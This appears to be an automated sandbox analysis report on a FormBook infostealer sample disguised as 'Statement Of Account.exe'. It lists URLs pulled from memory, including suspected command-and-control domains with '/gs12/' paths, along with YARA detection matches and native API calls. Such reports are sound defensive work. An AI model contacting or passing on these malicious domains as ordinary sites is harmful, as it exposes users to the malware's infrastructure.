Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.com/gs12/www.kustomequipment.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.com/gs12/www.udin88b.us
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.com/gs12/www.nexelab.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.com/gs12/www.demandstudiosnews.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.us
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.us/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.us/gs12/www.baansbliss.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.usReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.com/gs12/www.hjgd.xyz
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000009.00000002.2951588982.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000009.00000000.1710227267.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2940190226.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.2951588982.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
.NET source code contains very large array initializations
Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.cs Large array initialization: : array initializer size 33604
.NET source code contains very large strings
Source: Statement Of Account.exe, Form1.cs Long String: Length: 129808
Source: SdYCcXyq.exe.0.dr, Form1.cs Long String: Length: 129808
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AD0 NtReadFile,LdrInitializeThunk, 8_2_00FB2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_00FB2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2B60 NtClose,LdrInitializeThunk, 8_2_00FB2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_00FB2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_00FB2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_00FB2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2DD0 NtDelayExecution,LdrInitializeThunk, 8_2_00FB2DD0
